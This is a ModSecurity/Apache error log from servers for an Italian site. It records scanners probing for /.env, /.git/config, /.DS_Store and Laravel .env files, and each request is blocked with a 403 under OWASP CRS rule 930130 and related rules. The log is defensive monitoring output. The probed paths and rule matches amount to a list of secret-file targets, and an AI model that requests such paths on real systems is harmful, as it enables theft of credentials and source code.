[Tue Oct 28 16:05:21.095685 2025] [:error] [pid 3820002] [client 157.230.19.140:34182] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDbsRGNgAnFnvqbwgf8hgAAAAc"]
[Tue Oct 28 16:05:21.095886 2025] [:error] [pid 3820002] [client 157.230.19.140:34182] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDbsRGNgAnFnvqbwgf8hgAAAAc"]
[Tue Oct 28 16:05:21.096050 2025] [:error] [pid 3820002] [client 157.230.19.140:34182] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQDbsRGNgAnFnvqbwgf8hgAAAAc"]
[Tue Oct 28 16:05:21.187534 2025] [:error] [pid 3819778] [client 157.230.19.140:34192] [client 157.230.19.140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDbsdkLnaGH-0JONzc_pgAAAAA"]
[Tue Oct 28 16:05:21.187743 2025] [:error] [pid 3819778] [client 157.230.19.140:34192] [client 157.230.19.140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDbsdkLnaGH-0JONzc_pgAAAAA"]
[Tue Oct 28 16:05:21.187905 2025] [:error] [pid 3819778] [client 157.230.19.140:34192] [client 157.230.19.140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQDbsdkLnaGH-0JONzc_pgAAAAA"]
[Tue Oct 28 18:46:13.670437 2025] [authz_core:error] [pid 3834726] [client 68.183.180.73:37568] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Tue Oct 28 18:46:16.871183 2025] [:error] [pid 3834724] [client 68.183.180.73:37580] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQEBaGPzXa1d0xfwy9N3-gAAAAA"]
[Tue Oct 28 18:46:16.871389 2025] [:error] [pid 3834724] [client 68.183.180.73:37580] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQEBaGPzXa1d0xfwy9N3-gAAAAA"]
[Tue Oct 28 18:46:16.871534 2025] [:error] [pid 3834724] [client 68.183.180.73:37580] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aQEBaGPzXa1d0xfwy9N3-gAAAAA"]
[Tue Oct 28 18:46:17.914739 2025] [:error] [pid 3834245] [client 68.183.180.73:60900] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQEBaU6gn6haqoELlQDAAAAAAAE"]
[Tue Oct 28 18:46:17.914943 2025] [:error] [pid 3834245] [client 68.183.180.73:60900] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQEBaU6gn6haqoELlQDAAAAAAAE"]
[Tue Oct 28 18:46:17.915113 2025] [:error] [pid 3834245] [client 68.183.180.73:60900] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aQEBaU6gn6haqoELlQDAAAAAAAE"]
[Tue Oct 28 18:46:18.933690 2025] [:error] [pid 3835874] [client 68.183.180.73:60904] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQEBatDdiJ4jeWT_S0M1CgAAAAY"]
[Tue Oct 28 18:46:18.933920 2025] [:error] [pid 3835874] [client 68.183.180.73:60904] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQEBatDdiJ4jeWT_S0M1CgAAAAY"]
[Tue Oct 28 18:46:18.934085 2025] [:error] [pid 3835874] [client 68.183.180.73:60904] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aQEBatDdiJ4jeWT_S0M1CgAAAAY"]
[Wed Oct 29 03:16:54.634371 2025] [authz_core:error] [pid 3845148] [client 207.154.197.113:48460] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Oct 29 03:16:55.406663 2025] [:error] [pid 3845150] [client 207.154.197.113:48478] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5F3ZXeBDxC79PL3HXUwAAAAs"]
[Wed Oct 29 03:16:55.406930 2025] [:error] [pid 3845150] [client 207.154.197.113:48478] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5F3ZXeBDxC79PL3HXUwAAAAs"]
[Wed Oct 29 03:16:55.407125 2025] [:error] [pid 3845150] [client 207.154.197.113:48478] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5F3ZXeBDxC79PL3HXUwAAAAs"]
[Wed Oct 29 03:16:55.417362 2025] [authz_core:error] [pid 3845151] [client 209.38.248.17:60892] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Oct 29 03:16:55.463710 2025] [:error] [pid 3845149] [client 207.154.197.113:48486] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F_RHfsSUdmR3RT7FjwAAAAo"]
[Wed Oct 29 03:16:55.466470 2025] [:error] [pid 3845149] [client 207.154.197.113:48486] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F_RHfsSUdmR3RT7FjwAAAAo"]
[Wed Oct 29 03:16:55.466811 2025] [:error] [pid 3845149] [client 207.154.197.113:48486] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F_RHfsSUdmR3RT7FjwAAAAo"]
[Wed Oct 29 03:16:55.518761 2025] [:error] [pid 3844841] [client 207.154.197.113:48488] [client 207.154.197.113] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F0bDiWvq6qeNvSRcOgAAAAQ"]
[Wed Oct 29 03:16:55.519057 2025] [:error] [pid 3844841] [client 207.154.197.113:48488] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F0bDiWvq6qeNvSRcOgAAAAQ"]
[Wed Oct 29 03:16:55.520587 2025] [:error] [pid 3844841] [client 207.154.197.113:48488] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F0bDiWvq6qeNvSRcOgAAAAQ"]
[Wed Oct 29 03:16:55.706304 2025] [:error] [pid 3844875] [client 209.38.248.17:60932] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5FwAFADb6gAEQs-4AeAAAAAU"]
[Wed Oct 29 03:16:55.706558 2025] [:error] [pid 3844875] [client 209.38.248.17:60932] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5FwAFADb6gAEQs-4AeAAAAAU"]
[Wed Oct 29 03:16:55.706735 2025] [:error] [pid 3844875] [client 209.38.248.17:60932] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aQF5FwAFADb6gAEQs-4AeAAAAAU"]
[Wed Oct 29 03:16:55.760850 2025] [:error] [pid 3844838] [client 209.38.248.17:60946] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F80pe_7wj3RxLl5CWwAAAAE"]
[Wed Oct 29 03:16:55.761047 2025] [:error] [pid 3844838] [client 209.38.248.17:60946] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F80pe_7wj3RxLl5CWwAAAAE"]
[Wed Oct 29 03:16:55.761206 2025] [:error] [pid 3844838] [client 209.38.248.17:60946] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aQF5F80pe_7wj3RxLl5CWwAAAAE"]
[Wed Oct 29 03:16:55.814326 2025] [:error] [pid 3845146] [client 209.38.248.17:60962] [client 209.38.248.17] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F2M-_JMCrXm4lAhSCQAAAAc"]
[Wed Oct 29 03:16:55.814552 2025] [:error] [pid 3845146] [client 209.38.248.17:60962] [client 209.38.248.17] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F2M-_JMCrXm4lAhSCQAAAAc"]
[Wed Oct 29 03:16:55.814693 2025] [:error] [pid 3845146] [client 209.38.248.17:60962] [client 209.38.248.17] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aQF5F2M-_JMCrXm4lAhSCQAAAAc"]
[Wed Oct 29 18:46:34.352400 2025] [:error] [pid 3861039] [client 45.156.87.11:54380] [client 45.156.87.11] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQJS-qUL46XBMIvQILjxsAAAACw"]
[Wed Oct 29 18:46:34.352664 2025] [:error] [pid 3861039] [client 45.156.87.11:54380] [client 45.156.87.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQJS-qUL46XBMIvQILjxsAAAACw"]
[Wed Oct 29 18:46:34.352818 2025] [:error] [pid 3861039] [client 45.156.87.11:54380] [client 45.156.87.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aQJS-qUL46XBMIvQILjxsAAAACw"]
[Wed Oct 29 18:49:59.709538 2025] [:error] [pid 3861061] [client 45.156.87.11:60292] [client 45.156.87.11] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aQJTxxCyB59I3GwUwhbrvAAAAEI"]
[Wed Oct 29 18:49:59.709791 2025] [:error] [pid 3861061] [client 45.156.87.11:60292] [client 45.156.87.11] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aQJTxxCyB59I3GwUwhbrvAAAAEI"]
[Wed Oct 29 18:49:59.709971 2025] [:error] [pid 3861061] [client 45.156.87.11:60292] [client 45.156.87.11] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aQJTxxCyB59I3GwUwhbrvAAAAEI"]
